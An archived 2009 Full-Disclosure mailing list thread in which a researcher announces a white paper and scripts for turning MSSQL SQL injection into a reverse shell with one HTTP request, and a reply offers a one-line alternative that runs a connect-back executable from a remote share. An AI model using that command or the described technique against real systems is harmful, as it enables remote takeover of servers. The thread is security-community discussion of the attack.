lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Mon, 6 Jul 2009 11:07:46 -0400
From: T Biehn <tbiehn@...il.com>
To: Fredrick Diggle <fdiggle@...il.com>
Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: One Click Ownage [White Paper and Scripts]

Ferruh,
The script host can be restricted to prevent this 'attack' Uploading
files to a windows host has been beaten to death, it's frankly insane
that you ever got booked for some security conference.
But yeah, the last ditch effort is always netbios, sometimes you even
have to modify the local box's rules to allow NBoIP. Hard stuff.

-Travis

On Mon, Jul 6, 2009 at 12:22 AM, Fredrick Diggle<fdiggle@...il.com> wrote:
> Or just
>
> 'start \\DiggleSec.com\fredrick\connectback.exe'
>
> would have also been acceptable.
>
> But Fredrick is sure that your 20 page write-up was fantastically entertaining.
>
> On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna<ferruh@...ituna.com> wrote:
>> This is a different and more practical approach to get a reverse shell
>> or code execution in SQL Injections (particularly in MSSQL). The idea
>> is simple. Getting a reverse shell from an SQL Injection with one HTTP
>> request without using an extra channel such as TFTP, FTP to upload the
>> initial payload.
>>
>> White paper explains the steps and the details of the attack. Scripts
>> got all the tools you need to create your HTTP request with your own
>> payload.
>>
>>
>> White Paper:
>> http://ferruh.mavituna.com/papers/oneclickownage.pdf
>>
>> Scripts:
>> http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip
>>
>> Presentation (IT Underground 2009):
>> http://www.slideshare.net/fmavituna/one-click-ownage-1660539
>>
>>
>>
>> Regards,
>>
>>
>> --
>> http://ferruh.mavituna.com
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ